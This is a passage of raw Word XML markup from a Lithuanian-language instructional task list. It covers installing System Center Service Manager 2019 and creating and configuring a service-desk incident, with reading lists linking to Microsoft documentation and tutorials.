      <w:r w:rsidR="21E2F8C0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>System Center Service Manager</w:t>
      </w:r>
      <w:r w:rsidR="7841F592" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2019</w:t>
      </w:r>
      <w:r w:rsidR="00EE6B44" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="21E2F8C0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="1195F1CA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>arba</w:t>
      </w:r>
      <w:r w:rsidR="0061226A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1195F1CA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>lygiavertę</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="1195F1CA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="498D659F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ir visus reikalingus programų rinkinius</w:t>
      </w:r>
      <w:r w:rsidR="18F07EDC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="27F5ED75" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tlik</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="260A17D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pirminį</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> konfigūravimą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E5A577" w14:textId="77777777" w:rsidR="009358A9" w:rsidRPr="005A5C28" w:rsidRDefault="009358A9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE32A5D" w14:textId="3BBE7175" w:rsidR="60108A71" w:rsidRPr="005A5C28" w:rsidRDefault="580FE7DA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAB8DC3" w14:textId="705F81BD" w:rsidR="60108A71" w:rsidRPr="005A5C28" w:rsidRDefault="4BD318F3" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Install Service Manager on a single computer (minimum configuration). (2018, sausio 23). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="79A7C4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId71">
        <w:r w:rsidR="1EA1D687" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/system-center/scsm/install-one-computer?view=sc-sm-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E4A8021" w14:textId="68B3EE37" w:rsidR="60108A71" w:rsidRPr="005A5C28" w:rsidRDefault="37DFB2AA" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>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Ram (2019, gruodžio 30).</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="202D842C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">How to install System Center Service Manager 2019? </w:t>
      </w:r>
      <w:r w:rsidR="15406BC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>InfoTechRam.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="79A7C4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00704E3F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidR="00704E3F" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.infotechram.com/index.php/2019/12/30/how-to-install-system-center-service-manager-2019/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31E5E0D0" w14:textId="3D001DA7" w:rsidR="20343178" w:rsidRPr="005A5C28" w:rsidRDefault="042DA146" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>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Prepare for System Center - Service Manager deployment. (</w:t>
      </w:r>
      <w:r w:rsidR="01EFBACF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2020, gruodžio 9).</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Microsoft.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="79A7C4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="1EA1D687" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://docs.microsoft.com/en-us/system-center/scsm/prepare-deploy?view=sc-sm-2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524105A6" w14:textId="77BE60EF" w:rsidR="70D2AF4F" w:rsidRPr="005A5C28" w:rsidRDefault="3A237918" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>How to Install System Center Service Manager 2019 Step by Step Full</w:t>
      </w:r>
      <w:r w:rsidR="4EA85278" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. (2020, rugsėjo 21). </w:t>
      </w:r>
      <w:hyperlink r:id="rId73">
        <w:r w:rsidR="4EA85278" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Labs Hands On</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="4EA85278" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="4EA85278" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId74">
        <w:r w:rsidR="410DA8D6" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=3TPsuio8PP8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75582410" w14:textId="506A6BF9" w:rsidR="70D2AF4F" w:rsidRPr="005A5C28" w:rsidRDefault="70D2AF4F" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04556E83" w14:textId="3513F76C" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="013386FF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="6F3B726E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="6F3B726E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3612D595" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SU</w:t>
      </w:r>
      <w:r w:rsidR="20DEEBFD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">KURTI </w:t>
      </w:r>
      <w:r w:rsidR="1A406F50" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IR</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1A406F50" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>KONFIGŪRUOTI IS</w:t>
      </w:r>
      <w:r w:rsidR="20DEEBFD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> INCIDENTĄ</w:t>
      </w:r>
      <w:r w:rsidR="73CB0524" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> INCIDENTŲ VALDYMO SISTEMOJE</w:t>
      </w:r>
      <w:r w:rsidR="7462B8A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C84007" w14:textId="2FBDA257" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="337DC12D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="00E07ED8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">diegtoje informacinėje valdymo sistemoje (Service Desk) </w:t>
      </w:r>
      <w:r w:rsidR="007C7ADA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>System Center Service Manager 2019</w:t>
      </w:r>
      <w:r w:rsidR="007C7ADA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B23101" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (arba lygiavertėje)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> suku</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>incidentą.</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Glaustai </w:t>
      </w:r>
      <w:r w:rsidR="00852893" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aprašykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>incidento kūrimą</w:t>
      </w:r>
      <w:r w:rsidR="789B7353" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir konfigūravim</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>o procesą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0472A5" w14:textId="33406750" w:rsidR="68081639" w:rsidRPr="005A5C28" w:rsidRDefault="68081639" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5078A642" w14:textId="3BBE7175" w:rsidR="47B77404" w:rsidRPr="005A5C28" w:rsidRDefault="23EF384B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EB5AEB" w14:textId="54DB7CE2" w:rsidR="150C33D1" w:rsidRPr="005A5C28" w:rsidRDefault="29982970" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Plan for System Center - Service Manager deployment. (</w:t>
      </w:r>
      <w:r w:rsidR="55F08188" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2018, sausio 23). </w:t>
      </w:r>
      <w:r w:rsidR="55F08188" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="79A7C4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="77C03277" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://docs.microsoft.com/en-us/system-center/scsm/plan-deployment?view=sc-sm-2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537CFFBC" w14:textId="44608FDF" w:rsidR="4EF799A5" w:rsidRPr="005A5C28" w:rsidRDefault="10688464" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure Incident Management in Service Manager. (2016, spalio 12). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="79A7C4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId75">
        <w:r w:rsidR="4845487A" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60B87710" w14:textId="2F6F31EA" w:rsidR="69D557A0" w:rsidRPr="005A5C28" w:rsidRDefault="3D0C233C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
